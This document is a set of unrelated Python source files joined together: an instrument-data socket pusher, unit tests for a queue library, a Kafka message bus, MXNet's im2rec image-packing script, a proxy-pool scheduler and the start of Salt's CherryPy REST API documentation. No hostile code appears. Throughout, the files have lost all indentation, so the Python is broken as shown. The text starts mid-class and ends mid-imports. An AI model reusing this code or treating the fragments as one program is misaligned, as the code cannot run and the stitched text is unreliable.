def newdata(self, lineid, plot_opts=None, series_opts=None):
"""Start new plot"""
#logging.debug('Processing new data for '+self.instrument)
plot_opts = {} if plot_opts is None else plot_opts
series_opts = {} if series_opts is None else series_opts
self.isplottable = False
self.current_lineid = lineid
#self.queue.put(self)
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
prev_pol_id = self.previous_lineid[-2:-1]
curr_pol_id = lineid[-2:-1]
prev_pol_index = self.polarized_ids.index(prev_pol_id) if prev_pol_id in self.polarized_ids else -1
curr_pol_index = self.polarized_ids.index(curr_pol_id) if curr_pol_id in self.polarized_ids else -1
if prev_pol_index < 0 or curr_pol_index < 0 or curr_pol_index <= prev_pol_index:
if self.debug: sys.stdout.write('\t'.join(["resetting: ", str(lineid)])); sys.stdout.flush()
self.data_channel.emit('data', {"command": "Configure", "lineid": lineid, "runid": runid, "comment": comment, "primary": primary, "plot_opts": plot_opts})
self.previous_lineid = lineid
if self.debug: print "new data: ", lineid, self.data[lineid].columns, runid, comment, 'column length:', len(self.data[lineid].columns.keys())
self.data_channel.emit('data', {
"command": "newdata",
"lineid": lineid,
"runid": runid,
"comment": comment,
"primary": primary,
"poiss_err": True,
"series_opts": series_opts})
def enddata(self, lineid):
"""End a plot; plot a peak"""
#logging.debug('Processing end data for '+self.instrument)
self.isplottable = True
self.current_lineid = lineid
#self.queue.put(self)
if self.debug: sys.stdout.write('\t'.join(["end data: ", str(lineid), str(self.data[lineid].columns)])); sys.stdout.flush()
self.data_channel.emit('data', {"command": "enddata", "lineid": lineid})
line = self.data[lineid]
if line.peak:
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
# Annotate plot with peak parameters
xlo,xhi=line.columns[line.primary][0],line.columns[line.primary][-1]
x = numpy.linspace(xlo,xhi,201)
y = line.peak(x)
new_state = [{
"command": "newdata",
"lineid": lineid + '_fit',
"runid": runid,
"comment": comment,
"primary": primary,
"poiss_err": False,
"series_opts": {"z_index": 10, "markerOptions": {"show": False}}}]
for xx, yy in zip(x,y):
datapoint = {line.primary: xx, 'DATA': yy}
new_state.append({"command": "newpoint", "lineid": lineid + '_fit', "pointdata": datapoint})
self.data_channel.emit('data', {"command": "reset", "lineid": lineid + '_fit', "records": new_state});
def newpoint(self, lineid):
self.isplottable = True
self.current_lineid = lineid
columns = self.data[lineid].columns
column_names = list(columns.keys())
column_names.sort()
datapoint = {}
for cn in column_names:
datapoint[cn] = columns[cn][-1]
#print cn + ': ' + str(columns[cn][-1]),
pass
self.data_channel.emit('data', {"command": "newpoint", "lineid": lineid, "pointdata": datapoint, "eta": self.data[lineid].eta()})
#print
def __repr__(self):
return "XPeekWeb('%s')"%self.instrument
class BT1XPeekToSIO(XPeekToSIO):
BT1_scale = numpy.array([
2.700, 2.479, 2.827, 2.483, 2.260, 2.347, 2.011, 1.749,
1.630, 1.360, 1.339, 1.218, 1.058, 1.000, 1.054, 0.953,
0.941, 0.985, 1.031, 1.021, 0.982, 1.011, 0.900, 1.118,
0.955, 1.056, 0.973, 0.974, 0.943, 0.877, 0.872, 0.820,
])
# BT1 detector zeros in hundredths of a degree
BT1_zeros = numpy.array([
0.00, 1.00, 1.29, -0.48, 1.53, -0.98, 2.03, 0.89,
1.54, 1.28, 0.40, 0.35, 1.53, -1.57, 0.63, 1.43,
-0.08, -0.01, -0.78, 0.16, -1.08, -2.08, -1.23, -0.47,
0.43, -0.27, -2.60, 0.88, -1.34, 2.24, 3.00, 4.00,
]) * 0.01
#BT1_scale = numpy.array(BT1_scl)
#BT1_zeros = numpy.array(BT1_z_c)*0.01
def newpoint(self, lineid):
self.isplottable = True
self.current_lineid = lineid
#################################################
# from ipeek.plot:
all_counts = numpy.array(self.data[lineid].columns['DATA']) * self.BT1_scale
#print "all_counts shape: ", all_counts.shape
i = all_counts.shape[0] - 1
#counts *= self.BT1_scale
a04 = self.data[lineid].columns['A04'][-1]
#print "A04: ", a04
#print "A04 shape: ", numpy.array(self.data[lineid].columns['A04']).shape
x = a04 + 5*numpy.arange(len(self.BT1_zeros)) - self.BT1_zeros
y = all_counts[i] * self.BT1_scale
#################################################
columns = self.data[lineid].columns
column_names = list(columns.keys())
column_names.sort()
datapoint = {}
eta = self.data[lineid].eta()
for cn in column_names:
if cn not in ['DATA', 'A04']:
datapoint[cn] = columns[cn][-1]
#print cn + ': ' + str(columns[cn][-1]),
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
#self.data_channel.emit('data', {"command": "newdata", "lineid": lineid + str(i), "runid": runid, "comment": comment, "primary": primary})
for i, (xx, yy) in enumerate(zip(x,y)):
datapoint['DATA'] = yy
datapoint['A04'] = xx
self.data_channel.emit('data', {"command": "newpoint", "lineid": lineid + '_%02d' % (i,), "pointdata": datapoint, "eta": eta})
#self.data_channel.emit('data', {"command": "newpoint", "lineid": lineid, "pointdata": datapoint, "eta": self.data[lineid].eta()})
def newdata(self, lineid, plot_opts=None):
plot_opts = {"legend": {"show": False}}
lineids = [lineid + '_%02d' % (i,) for i in range(len(self.BT1_scale))]
runid = self.data[lineid].runid
comment = self.data[lineid].comment
primary = self.data[lineid].primary
print "resetting: ", lineid
self.data_channel.emit('data', {"command": "Configure", "lineid": lineid, "runid": runid, "comment": comment, "primary": primary, "plot_opts": plot_opts})
for li in lineids:
self.data_channel.emit('data', {"command": "newdata", "lineid": li, "runid": runid, "comment": comment, "primary": primary})
#path='/CGD'
#repeater.connect(path+"/data"), shutdown_signal)
def shutdown(signum, frame):
#print "shutting down", signum, frame
sys.exit(1)
def main(debug=False):
#xpeekpusher = XPeekToSIO(INSTRUMENT)
#xpeekpusher.process_stream()
import threading
threads = []
pushers = []
for instrument in INSTRUMENTS:
sys.stdout.write('trying to add' + repr(instrument) + '...\n')
#if instrument == 'BT1':
if 0: #disable BT1 pusher for now
pusher = BT1XPeekToSIO(instrument)
else:
pusher = XPeekToSIO(instrument, debug=debug)
pushers.append(pusher)
new_thread = threading.Thread(target=pusher.process_stream)
threads.append(new_thread)
new_thread.start()
sys.stdout.write(repr(pusher))
sys.stdout.flush()
#signal.signal(signal.SIGTERM, shutdown)
for t in threads:
t.join()
if __name__ == '__main__':
main(debug=True)
|
__init__.py
|
import weakref
import gc
import threading
import unittest
from succession import _Chain, _SuccessionIterator, Succession, TimeoutError
class TestSuccession(unittest.TestCase):
def test_chain(self):
chain = _Chain()
chain.push(2)
self.assertEqual(chain.wait_result(), 2)
self.assertIsInstance(chain.wait_next(), _Chain)
def test_chain_iter(self):
head = _Chain()
chain = head
for i in [1, 2, 3, 4, 5]:
chain = chain.push(i)
chain.close()
self.assertEqual(list(_SuccessionIterator(head)), [1, 2, 3, 4, 5])
def test_memory(self):
# Make sure that chains don't hold references to previous links
chain = _Chain()
head = weakref.ref(chain)
for i in range(1000):
chain = chain.push(i)
gc.collect()
self.assertIsNone(head())
def test_iter_memory(self):
# Make sure that chain iterators do not hold a reference to the head
chain = _Chain()
def push_1000(chain):
for i in range(1000):
chain = chain.push(i)
t = threading.Thread(target=push_1000, args=(chain,), daemon=True)
iterator = _SuccessionIterator(chain)
chain = weakref.ref(chain)
t.start()
for i in range(1000):
next(iterator)
t.join()
gc.collect()
self.assertIsNone(chain())
def test_succession(self):
succession = Succession()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
succession.close()
self.assertEqual(list(succession), [1, 2, 3, 4, 5])
def test_zero_timeout(self):
succession = Succession()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
self.assertEqual(list(succession.iter(timeout=0)), [1, 2, 3, 4, 5])
def test_nonzero_timeout(self):
succession = Succession()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
result = []
try:
for item in succession.iter(timeout=0.01):
result.append(item)
except TimeoutError:
self.assertEqual(result, [1, 2, 3, 4, 5])
else: # pragma: no cover
self.fail()
def test_release_iter(self):
succession = Succession(compress=lambda hd: [])
root = weakref.ref(succession._root)
iterator = weakref.ref(iter(succession))
for i in [1, 2, 3, 4, 5]:
succession.push(i)
gc.collect()
self.assertIsNone(root())
self.assertIsNone(iterator())
def test_compress_after_push(self):
succession = Succession(compress=lambda items: [sum(items)])
from_start = succession.iter()
for i in [1, 2, 3, 4, 5]:
succession.push(i)
succession.close()
from_end = succession.iter()
self.assertEqual(list(from_start), [1, 2, 3, 4, 5])
self.assertEqual(list(from_end), [15])
def test_drop_after_push(self):
succession = Succession(compress=lambda hd: [])
from_start = succession.iter()
for i in [1, 2, 3]:
succession.push(i)
from_middle = succession.iter()
for i in [4, 5, 6]:
succession.push(i)
succession.close()
from_end = succession.iter()
self.assertEqual(list(from_start), [1, 2, 3, 4, 5, 6])
self.assertEqual(list(from_middle), [4, 5, 6])
self.assertEqual(list(from_end), [])
def test_compress_iter_saved(self):
succession = Succession(compress=lambda hd: (i for i in hd))
succession.push(0)
succession.push(1)
succession.push(2)
succession.push(3)
first = succession.head()
second = succession.head()
self.assertEqual(list(first), [0, 1, 2, 3])
self.assertEqual(list(second), [0, 1, 2, 3])
def test_head(self):
succession = Succession()
self.assertEqual(list(succession.head()), [])
for i in [1, 2, 3, 4, 5]:
succession.push(i)
self.assertEqual(list(succession.head()), [1, 2, 3, 4, 5])
succession.close()
def test_echo(self):
req = Succession()
res = Succession()
def echo():
for m in req:
res.push(m)
res.close()
t = threading.Thread(target=echo)
t.start()
res_iter = iter(res)
req.push(1)
self.assertEqual(next(res_iter), 1)
req.push(2)
self.assertEqual(next(res_iter), 2)
req.push(3)
self.assertEqual(next(res_iter), 3)
req.close()
t.join()
loader = unittest.TestLoader()
suite = unittest.TestSuite((
loader.loadTestsFromTestCase(TestSuccession),
))
|
kafka_mb.py
|
from typing import Any, Callable, List, Mapping, TypedDict
from kafka import KafkaProducer, KafkaConsumer
from helpers.transport.interface import MessageBus
from helpers.transport.kafka_config import KafkaEventMap
import threading
def get_kafka_connection_parameters(bootstrap_servers: str, sasl_mechanism: str, sasl_plain_username: str = '', sasl_plain_password: str = '') -> Mapping[str, Any]:
if sasl_mechanism == '':
sasl_mechanism = 'PLAIN'
return {
'bootstrap_servers': bootstrap_servers,
'sasl_mechanism': sasl_mechanism,
'sasl_plain_username': sasl_plain_username,
'sasl_plain_password': sasl_plain_password
}
class KafkaMessageBus(MessageBus):
def __init__(self, kafka_connection_parameters: Mapping[str, Any], kafka_event_map: KafkaEventMap, **kafka_config: Any):
self.kafka_connection_parameters = kafka_connection_parameters
self.kafka_event_map = kafka_event_map
self.consumers: Mapping[str, KafkaConsumer] = {}
self.event_map = kafka_event_map
def shutdown(self):
for event_name, consumer in self.consumers.items():
print('stop listening to {event_name}'.format(event_name=event_name))
consumer.close()
def handle(self, event_name: str) -> Callable[..., Any]:
def register_event_handler(event_handler: Callable[[Any], Any]):
topic = self.event_map.get_topic(event_name)
group_id = self.event_map.get_group_id(event_name)
consumer = KafkaConsumer(topic, group_id=group_id, **self.kafka_connection_parameters)
self.consumers[event_name] = consumer
thread = threading.Thread(target=self._handle, args=[consumer, event_name, topic, group_id, event_handler])
thread.start()
return register_event_handler
def _handle(self, consumer: KafkaConsumer, event_name: str, topic: str, group_id: str, event_handler: Callable[[Any], Any]):
for serialized_message in consumer:
message = self.event_map.get_decoder(event_name)(serialized_message.value)
print({'action': 'handle_kafka_event', 'event_name': event_name, 'message': message, 'topic': topic, 'group_id': group_id, 'serialized': serialized_message})
event_handler(message)
def publish(self, event_name: str, message: Any) -> Any:
producer = KafkaProducer(**self.kafka_connection_parameters)
topic = self.event_map.get_topic(event_name)
serialized_message = self.event_map.get_encoder(event_name)(message)
print({'action': 'publish_kafka_event', 'event_name': event_name, 'message': message, 'topic': topic, 'serialized': serialized_message})
producer.send(topic, serialized_message)
producer.close()
|
im2rec.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
try:
import multiprocessing
except ImportError:
multiprocessing = None
def list_image(root, recursive, exts):
"""Traverses the root of directory that contains images and
generates image list iterator.
Parameters
----------
root: string
recursive: bool
exts: string
Returns
-------
image iterator that contains all the image under the specified path
"""
i = 0
if recursive:
cat = {}
for path, dirs, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
print(os.path.relpath(k, root), v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (i, os.path.relpath(fpath, root), 0)
i += 1
def write_list(path_out, image_list):
"""Hepler function to write image list into the file.
The format is as below,
integer_image_index \t float_label_index \t path_to_image
Note that the blank between number and tab is only used for readability.
Parameters
----------
path_out: string
image_list: list
"""
with open(path_out, 'w') as fout:
for i, item in enumerate(image_list):
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
def make_list(args):
"""Generates .lst file.
Parameters
----------
args: object that contains all the arguments
"""
image_list = list_image(args.root, args.recursive, args.exts)
image_list = list(image_list)
if args.shuffle is True:
random.seed(100)
random.shuffle(image_list)
N = len(image_list)
chunk_size = (N + args.chunks - 1) // args.chunks
for i in range(args.chunks):
chunk = image_list[i * chunk_size:(i + 1) * chunk_size]
if args.chunks > 1:
str_chunk = '_%d' % i
else:
str_chunk = ''
sep = int(chunk_size * args.train_ratio)
sep_test = int(chunk_size * args.test_ratio)
if args.train_ratio == 1.0:
write_list(args.prefix + str_chunk + '.lst', chunk)
else:
if args.test_ratio:
write_list(args.prefix + str_chunk + '_test.lst', chunk[:sep_test])
if args.train_ratio + args.test_ratio < 1.0:
write_list(args.prefix + str_chunk + '_val.lst', chunk[sep_test + sep:])
write_list(args.prefix + str_chunk + '_train.lst', chunk[sep_test:sep_test + sep])
def read_list(path_in):
"""Reads the .lst file and generates corresponding iterator.
Parameters
----------
path_in: string
Returns
-------
item iterator that contains information in .lst file
"""
with open(path_in) as fin:
while True:
line = fin.readline()
if not line:
break
line = [i.strip() for i in line.strip().split('\t')]
line_len = len(line)
# check the data format of .lst file
if line_len < 3:
print('lst should have at least has three parts, but only has %s parts for %s' % (line_len, line))
continue
try:
item = [int(line[0])] + [line[-1]] + [float(i) for i in line[1:-1]]
except Exception as e:
print('Parsing lst met error for %s, detail: %s' % (line, e))
continue
yield item
def image_encode(args, i, item, q_out):
"""Reads, preprocesses, packs the image and put it back in output queue.
Parameters
----------
args: object
i: int
item: list
q_out: queue
"""
fullpath = os.path.join(args.root, item[1])
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
if args.pass_through:
try:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error:', item[1], e)
q_out.put((i, None, item))
return
try:
img = cv2.imread(fullpath, args.color)
except:
traceback.print_exc()
print('imread error trying to load file: %s ' % fullpath)
q_out.put((i, None, item))
return
if img is None:
print('imread read blank (None) image for file: %s' % fullpath)
q_out.put((i, None, item))
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
margin = (img.shape[0] - img.shape[1]) // 2
img = img[margin:margin + img.shape[1], :]
else:
margin = (img.shape[1] - img.shape[0]) // 2
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize // img.shape[1])
else:
newsize = (img.shape[1] * args.resize // img.shape[0], args.resize)
img = cv2.resize(img, newsize)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error on file: %s' % fullpath, e)
q_out.put((i, None, item))
return
def read_worker(args, q_in, q_out):
"""Function that will be spawned to fetch the image
from the input queue and put it back to output queue.
Parameters
----------
args: object
q_in: queue
q_out: queue
"""
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
"""Function that will be spawned to fetch processed image
from the output queue and write to the .rec file.
Parameters
----------
q_out: queue
fname: string
working_dir: string
"""
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
"""Defines all arguments.
Returns
-------
args object that contains all the params
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', action='store_true',
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg', '.png'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', action='store_true',
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--no-shuffle', dest='shuffle', action='store_false',
help='If this is passed, \
im2rec will not randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--pass-through', action='store_true',
help='whether to skip transformation and save image as is')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', action='store_true',
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', action='store_true',
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
# if the '--list' is used, it generates .lst file
if args.list:
make_list(args)
# otherwise read .lst file to generates .rec file
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
# define the process
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
# process images with num_thread process
for p in read_process:
p.start()
# only use one process to write .rec to avoid race-condtion
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
# put the image list into input queue
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
scheduler.py
|
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.db import RedisClient
from proxypool.setting import *
class Scheduler():
def schedule_tester(self, cycle=TESTER_CYCLE):
"""
定时测试代理
"""
tester = Tester()
while True:
print('测试器开始运行')
tester.run()
time.sleep(cycle)
def schedule_getter(self, cycle=GETTER_CYCLE):
"""
定时获取代理
"""
getter = Getter()
while True:
print('开始抓取代理')
getter.run()
time.sleep(cycle)
def schedule_api(self):
"""
开启API
"""
app.run(API_HOST, API_PORT,debug=True)
def run(self):
print('代理池开始运行')
#测试ip
if TESTER_ENABLED:
tester_process = Process(target=self.schedule_tester)
tester_process.start()
#获取代理ip
if GETTER_ENABLED:
getter_process = Process(target=self.schedule_getter)
getter_process.start()
#接口
if API_ENABLED:
api_process = Process(target=self.schedule_api)
api_process.start()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends:
- CherryPy Python module. Version 3.2.3 is currently recommended when
SSL is enabled, since this version worked the best with SSL in
internal testing. Versions 3.2.3 - 4.x can be used if SSL is not enabled.
Be aware that there is a known
`SSL error <https://bitbucket.org/cherrypy/cherrypy/issue/1298/ssl-not-working>`_
introduced in version 3.2.5. The issue was reportedly resolved with
CherryPy milestone 3.3, but the patch was committed for version 3.6.1.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request. The order of commands in the request
corresponds to the return for each command in the response.
Lowstate, broadly, is a dictionary of values that are mapped to a function
call. This pattern is used pervasively throughout Salt. The functions called
from netapi modules are described in :ref:`Client Interfaces <netapi-clients>`.
The following example (in JSON format) causes Salt to execute two commands, a
command sent to minions as well as a runner function on the master::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
from cherrypy.lib import cpstats
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
